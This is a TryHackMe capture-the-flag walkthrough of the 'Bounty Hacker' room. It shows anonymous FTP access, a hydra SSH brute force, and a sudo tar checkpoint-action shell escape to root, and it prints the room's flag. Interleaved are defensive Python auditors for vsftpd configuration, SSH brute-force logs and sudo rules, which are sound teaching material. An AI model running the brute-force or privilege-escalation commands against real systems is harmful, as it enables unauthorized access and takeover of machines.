Bounty Hunter Walkthrough | TryHackMe

KaarthikeyenG
4 min read · Nov 7, 2022


You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

Source: TryHackMe
Room: Bounty Hunter
Difficulty: Easy
Creator: ME

Hello Everyone!!! Hope you are doing well. This is a write-up of the Bounty Hacker room on TryHackMe, so let's get started and dive straight in.

1) Let's start with an nmap scan in aggressive mode (the flag is a capital -A; lowercase -a is not an nmap option)
Command: nmap -A <MachineIP>

2) We can see that there are 3 open ports, and that port 21 (FTP) has anonymous login enabled. Log in to the FTP server with this command and give the username as anonymous.
Command: ftp <MachineIP>

┌──(kaarthik㉿Kaarthik)-[~/THM/BountyHunter]
└─$ ftp 10.10.128.243
Connected to 10.10.128.243.
220 (vsFTPd 3.0.3)
Name (10.10.128.243:kaarthik): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive off
Passive mode: off; fallback to active mode: off.
ftp>

3) Now we can see that there are two files on the FTP server, locks.txt and task.txt. Use the get command to download both to the local system.

ftp>ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
226 Directory send OK.
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
100% |*******************************************| 418 9.05 MiB/s 00:00 ETA
226 Transfer complete.
418 bytes received in 00:00 (1.41 KiB/s)
ftp> get task.txt
local: task.txt remote: task.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
100% |*******************************************| 68 1.54 MiB/s 00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.23 KiB/s)
ftp>

4) With the cat command we open the two text files: locks.txt holds a list of passwords, and task.txt holds a note that gives away the author's name (our username).
Commands:
cat locks.txt
cat task.txt
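The whole FTP foothold in steps 2 to 4 exists because anonymous login is switched on. As an added defender-side example (not part of the room or the original write-up), here is a small checker for a vsftpd.conf, which is the server the banner in step 2 identifies. The two configuration texts are constructed; the option names are real vsftpd.conf keys. One edge case it handles: vsftpd's compiled-in default for anonymous_enable is YES, so a config that never mentions the key still allows anonymous logins.

```python
"""Audit a vsftpd.conf for anonymous access (added example, constructed samples)."""

WEAK_CONF = """\
# constructed sample: anonymous login left enabled
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
"""

HARDENED_CONF = """\
# constructed sample: anonymous login disabled, TLS enforced for local users
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""

# Defaults from vsftpd.conf(5) for the boolean keys we look at; an absent
# key takes the default, which is why an empty config still gets flagged.
DEFAULTS = {
    "anonymous_enable": "YES",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "write_enable": "NO",
}


def parse_vsftpd_conf(text):
    """Return {key: VALUE} for every 'key=value' line, ignoring comments and blanks."""
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        opts[key.strip()] = value.strip().upper()
    return opts


def audit_vsftpd(text):
    """Return a list of findings; an empty list means anonymous access is off."""
    opts = parse_vsftpd_conf(text)

    def effective(key):
        return opts.get(key, DEFAULTS[key])

    findings = []
    if effective("anonymous_enable") == "YES":
        findings.append("anonymous_enable is YES (or unset): anonymous FTP logins permitted")
        # Anonymous write needs write_enable plus one of the anon_* write switches.
        if effective("write_enable") == "YES" and (
            effective("anon_upload_enable") == "YES"
            or effective("anon_mkdir_write_enable") == "YES"
        ):
            findings.append("anonymous users may upload or create directories")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_vsftpd(conf) or ["no findings"])
```

Run against the weak sample it reports the anonymous login; against the hardened one it is silent. The room's server also offered no TLS, so the ssl_enable and force_local_* lines in the hardened sample are what keeps the real user credentials off the wire.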

5) Now that we have a username and a list of passwords, we need to test them against a service. We already know the SSH port is open, so we attack it with hydra, which tries the username against every password in the list.
Command: hydra -l lin -P locks.txt ssh://<MachineIP>

6) With valid credentials we can SSH into the machine using the following command, entering the password when prompted.
Command: ssh lin@<MachineIP>
Then change directory to /home/lin/Desktop, where we find the user.txt flag.

Boom!!! Now we have user access on the system.
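On the target, the hydra run in step 5 leaves a very recognisable trail: a burst of "Failed password" lines from one source address in sshd's auth log, followed here by an "Accepted password" from the same address. The detector below is an added example (not from the room or the original write-up) that scores exactly that pattern. The log lines are constructed to look like OpenSSH syslog output; the host name, addresses, PIDs and timestamps are invented, and the year is assumed because syslog timestamps do not carry one.

```python
"""Flag SSH password-guessing bursts in auth.log lines (added example, constructed log)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: 10.10.14.5 hammers user 'lin' and then gets in with a
# password; 10.10.14.9 has one typo and later uses a key.
SAMPLE_LOG = """\
Nov  7 10:15:01 bountyhacker sshd[1201]: Failed password for lin from 10.10.14.5 port 50122 ssh2
Nov  7 10:15:01 bountyhacker sshd[1203]: Failed password for lin from 10.10.14.5 port 50124 ssh2
Nov  7 10:15:02 bountyhacker sshd[1205]: Failed password for lin from 10.10.14.5 port 50126 ssh2
Nov  7 10:15:02 bountyhacker sshd[1207]: Failed password for lin from 10.10.14.5 port 50128 ssh2
Nov  7 10:15:03 bountyhacker sshd[1209]: Failed password for lin from 10.10.14.5 port 50130 ssh2
Nov  7 10:15:03 bountyhacker sshd[1211]: Accepted password for lin from 10.10.14.5 port 50132 ssh2
Nov  7 10:20:44 bountyhacker sshd[1300]: Failed password for lin from 10.10.14.9 port 41000 ssh2
Nov  7 10:30:10 bountyhacker sshd[1350]: Accepted publickey for lin from 10.10.14.9 port 41002 ssh2
"""

# Matches both real-user and 'invalid user' forms of the OpenSSH message.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line, year=2022):
    """Parse one sshd line into a dict, or None if it is not an auth result."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return [(ip, max_failures_in_window, password_success_after_burst), ...].

    An address is reported when it produced at least `threshold` failures
    inside any `window_seconds` span. The third field is True when a
    password-based login from that address succeeded at or after the last
    failure, i.e. the guessing most likely worked.
    """
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = []
    for ip, evs in by_ip.items():
        failures = sorted(e["ts"] for e in evs if e["result"] == "Failed")
        # Sliding window: j trails i so that failures[j..i] fit in the window.
        max_burst, j = 0, 0
        for i in range(len(failures)):
            while (failures[i] - failures[j]).total_seconds() > window_seconds:
                j += 1
            max_burst = max(max_burst, i - j + 1)
        if max_burst >= threshold:
            last_fail = failures[-1]
            success_after = any(
                e["result"] == "Accepted" and e["method"] == "password" and e["ts"] >= last_fail
                for e in evs
            )
            findings.append((ip, max_burst, success_after))
    return findings


if __name__ == "__main__":
    for ip, burst, compromised in detect_bruteforce(SAMPLE_LOG):
        print(f"{ip}: {burst} failures in window, password success afterwards: {compromised}")
```

With the defaults the sample yields one finding for 10.10.14.5 with the "success afterwards" flag set, which is the alert a SOC would want to escalate; the single failure from 10.10.14.9 stays below the threshold. The mitigation the room illustrates is equally plain: key-only authentication (PasswordAuthentication no) makes the entire locks.txt wordlist useless, and a lockout tool watching these same lines stops the burst long before password five.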

7) Now it's time to escalate to the root user. Let's run sudo -l to check the user's sudo privileges.

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tar

8) We can see that the user can run the /bin/tar binary with root privileges. With that confirmed, let's look up tar on GTFOBins; the command is listed under the sudo section. Paste it into the SSH session and we have escalated our privileges to root. Now it's easy to find the root flag.

lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root
# ls
user.txt
# cd ..
# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
# cd ..
# ls
lin
# cd ..
# ls
bin dev initrd.img lib64 mnt root snap tmp vmlinuz
boot etc initrd.img.old lost+found opt run srv usr vmlinuz.old
cdrom home lib media proc sbin sys var
# cd root
# ls
root.txt
# cat root.txt
THM{80UN7Y_h4cK3r}
#

Finally we got the root flag!!!😎🚩
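The root cause in steps 7 and 8 is a sudoers rule that grants a binary with a documented shell escape and puts no limit on its arguments. As an added example (not from the room or the original write-up), the script below parses sudo -l output of the kind shown above and flags such rules. The first rule in the sample is the write-up's own "(root) /bin/tar" line; the other two rules are constructed for contrast. The set of binaries is a small hand-picked subset of the GTFOBins sudo entries, not the full catalogue.

```python
"""Audit 'sudo -l' output for unrestricted shell-escape binaries (added example)."""
import re

# First rule copied from the write-up's sudo -l output; the other two are constructed.
SUDO_L_OUTPUT = r"""Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (root) NOPASSWD: /usr/bin/systemctl restart vsftpd
    (root) /usr/bin/apt-get update
"""

# Binaries whose GTFOBins 'sudo' entry documents a shell escape or arbitrary
# command execution. Deliberately partial; extend it from the catalogue.
SHELL_ESCAPE_BINARIES = {
    "tar", "vim", "vi", "less", "more", "find", "awk",
    "python3", "perl", "env", "bash", "sh",
}

# "(runas) TAG: TAG: /path/to/cmd args..."  (tags such as NOPASSWD are optional)
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text):
    """Return the command rules listed after the 'User X may run ...' header."""
    rules = []
    in_cmds = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        parts = m["cmd"].split()
        rules.append({
            "runas": m["runas"],
            "tags": re.findall(r"[A-Z]+(?=:)", m["tags"]),
            "binary": parts[0],
            "args": parts[1:],
        })
    return rules


def audit(rules):
    """Flag rules that hand out a shell-escape binary with no argument restriction."""
    findings = []
    for r in rules:
        name = r["binary"].rsplit("/", 1)[-1]
        if name in SHELL_ESCAPE_BINARIES and not r["args"]:
            findings.append(
                f"{r['binary']} runnable as ({r['runas']}) with any arguments: "
                f"shell escape documented on GTFOBins"
            )
    return findings


if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SUDO_L_OUTPUT)) or ["no findings"]:
        print(finding)
```

Only the tar rule is reported: sudoers accepted it with no arguments, so lin may append whatever options tar accepts, including --checkpoint-action. The fix is to pin the exact command line in sudoers (or point the rule at a root-owned wrapper script with a fixed tar invocation) so that extra options are rejected by sudo itself. Pinned arguments are the minimum, not a guarantee; wildcards in the rule or options that read configuration files still deserve a look, which is why the two constructed rules pass this check but should still be reviewed by hand.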

Come on, let's get connected!

Twitter:- https://twitter.com/Itz_kaarthik
Email:- g.kaarthik12@gmail.com
LinkedIn:- https://www.linkedin.com/in/kaarthikeyeng

Happy Hacking Guys
Cheers🥂
